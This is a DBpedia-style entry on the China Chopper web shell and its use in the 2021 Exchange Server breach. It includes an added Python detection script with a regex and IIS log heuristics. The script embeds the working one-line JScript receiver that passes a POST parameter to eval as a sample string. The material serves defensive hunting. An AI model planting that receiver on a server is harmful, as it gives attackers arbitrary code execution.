China Chopper


China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server.

Property Value
dbo:abstract China Chopper is a web shell approximately 4 kilobytes in size, first discovered in 2012. This web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. This web shell has two parts, the client interface (an executable file) and the receiver host file on the compromised web server. China Chopper has many command-and-control features, such as a password brute-force attack option, code obfuscation, file and database management and a graphical user interface. It was originally distributed from the website www.maicaidao.com, which is now down. FireEye revealed that the client of this web shell is programmed in Microsoft Visual C++ 6.0. China Chopper was used in attacks against eight Australian web hosting providers, which were compromised due to their use of an unsupported operating system (Windows Server 2008). The attackers connected the web servers to a Monero mining pool, through which they mined about 3868 AUD worth of Monero. In 2021, a version of the web shell programmed in JScript was used by the Advanced Persistent Threat group Hafnium to exploit four zero-day vulnerabilities in Microsoft Exchange Server, in the 2021 Microsoft Exchange Server data breach. This web shell was dropped when one of these vulnerabilities was exploited, allowing attackers to upload a program which ran with administrator privileges. With only the address of the .aspx file containing the script, an HTTP POST request could be made to the script with just a command in the request, causing the script to execute the command immediately using the JScript 'eval' function, allowing attackers to run arbitrary code on the server. (en)
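The abstract describes the receiver as a tiny .aspx file that passes whatever arrives in one POST parameter straight to the JScript eval function. The script below is an added example, not code from the page, from FireEye, or from the web shell's authors: it scans file contents for that eval(Request.Item[...]) receiver shape, walks constructed IIS W3C log lines for the POST traffic such a receiver attracts, and shows what the receiver would hand to eval for a given request body. The receiver sample, the parameter name "pass", the log lines, hostnames, IPs and paths are all constructed assumptions for illustration.

```python
"""Hunting a China Chopper-style ASPX receiver and the POST traffic that drives it.

Added example, not the page's or the web shell's own code. Every sample below is
constructed: the receiver text, the parameter name "pass", the IIS log records,
the IPs, hostnames and paths are assumptions made for illustration.
"""
import re
from urllib.parse import parse_qs

# Constructed sample of the one-line JScript receiver shape the abstract describes:
# the value of one request parameter is handed to eval() and executed immediately.
CHOPPER_ASPX_SAMPLE = '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>'
BENIGN_ASPX_SAMPLE = '<%@ Page Language="C#" AutoEventWireup="true" %><html><body>ok</body></html>'

# eval(Request.Item["<param>"], "unsafe") with flexible whitespace and quote style.
RECEIVER_RE = re.compile(
    r'eval\s*\(\s*Request\.Item\s*\[\s*["\']([^"\']+)["\']\s*\]\s*,\s*["\']unsafe["\']\s*\)',
    re.IGNORECASE,
)


def find_receiver_param(content: str):
    """Return the request parameter name fed to eval(), or None if the file looks clean."""
    m = RECEIVER_RE.search(content)
    return m.group(1) if m else None


# Constructed IIS W3C extended log: one #Fields header, then records (IIS writes '+' for spaces).
IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-03 10:15:20 10.0.0.5 GET /owa/auth/logon.aspx - 443 - 198.51.100.20 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.test/owa/ 200 0 0 31
2021-03-03 10:15:22 10.0.0.5 POST /owa/auth/error.aspx - 443 - 203.0.113.7 python-requests/2.25.1 - 200 0 0 15
2021-03-03 10:15:23 10.0.0.5 POST /owa/auth/logon.aspx - 443 - 198.51.100.20 Mozilla/5.0+(Windows+NT+10.0) https://mail.example.test/owa/auth/logon.aspx 302 0 0 44
2021-03-03 10:15:40 10.0.0.5 POST /aspnet_client/system_web/shell.aspx - 443 - 203.0.113.7 - - 200 0 0 9
"""


def parse_iis_w3c(text: str):
    """Yield one dict per record, keyed by the names in the most recent #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))


def suspicious_posts(text: str):
    """POSTs to .aspx pages that carry no Referer.

    A browser submitting an OWA form sends a Referer; a web shell client posting a
    command to a bare receiver page sends none. Returns (client ip, uri, user agent)
    tuples in log order so an analyst can pivot on the client address.
    """
    hits = []
    for rec in parse_iis_w3c(text):
        if rec["cs-method"] != "POST":
            continue
        if not rec["cs-uri-stem"].lower().endswith(".aspx"):
            continue
        if rec["cs(Referer)"] != "-":
            continue
        hits.append((rec["c-ip"], rec["cs-uri-stem"], rec["cs(User-Agent)"]))
    return hits


def evaluated_code(post_body: str, param: str):
    """Return the decoded value the receiver would pass to eval() for this request body.

    The body is form-encoded; the receiver reads the parameter found by
    find_receiver_param(). The JScript in the sample body is a constructed assumption.
    """
    return parse_qs(post_body, keep_blank_values=True).get(param, [None])[0]


# Constructed request body: one JScript statement, percent-encoded as a browser would.
SAMPLE_POST_BODY = "pass=Response.Write%28System.Environment.MachineName%29%3B"

if __name__ == "__main__":
    param = find_receiver_param(CHOPPER_ASPX_SAMPLE)
    print("receiver parameter:", param)
    print("clean file:", find_receiver_param(BENIGN_ASPX_SAMPLE))
    for ip, uri, ua in suspicious_posts(IIS_LOG):
        print("suspicious POST", ip, uri, ua)
    print("would be eval'd:", evaluated_code(SAMPLE_POST_BODY, param))
```

The file scan and the log hunt are complementary: a match from find_receiver_param names the parameter to look for in captured request bodies, and suspicious_posts narrows a large IIS log to the client addresses worth examining. The Referer heuristic is a starting point, not proof; legitimate API clients also omit it, so treat each hit as a pivot to the file on disk at that URI.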
dbo:wikiPageID 60187326 (xsd:integer)
dbo:wikiPageLength 4738 (xsd:nonNegativeInteger)
dbo:wikiPageRevisionID 1113654408 (xsd:integer)
dbo:wikiPageWikiLink dbr:Obfuscation_(software) dbr:Monero_(cryptocurrency) dbr:Hafnium_(group) dbr:Brute-force_attack dbr:Web_server dbr:Windows_Server_2008 dbr:Hacker dbr:2021_Microsoft_Exchange_Server_data_breach dbr:ASP.NET dbr:Database dbr:FireEye dbr:Graphical_user_interface dbr:Kilobyte dbr:POST_(HTTP) dbr:Privilege_(computing) dbr:JScript dbc:Web_security_exploits dbr:Advanced_persistent_threat dbc:Web_shells dbr:Microsoft_Exchange_Server dbr:Microsoft_Visual_C++ dbr:Mining_pool dbr:Web_hosting_service dbr:Web_shell dbr:Executable dbr:Zero-day_(computing)
dbp:wikiPageUsesTemplate dbt:Reflist dbt:Short_description dbt:Computer-security-stub
dcterms:subject dbc:Web_security_exploits dbc:Web_shells
rdfs:label China Chopper (en)
owl:sameAs wikidata:China Chopper https://global.dbpedia.org/id/9zWxr
prov:wasDerivedFrom wikipedia-en:China_Chopper?oldid=1113654408&ns=0
foaf:isPrimaryTopicOf wikipedia-en:China_Chopper
is dbo:wikiPageWikiLink of dbr:Hafnium_(group) dbr:2021_Microsoft_Exchange_Server_data_breach dbr:Web_shell
is foaf:primaryTopic of wikipedia-en:China_Chopper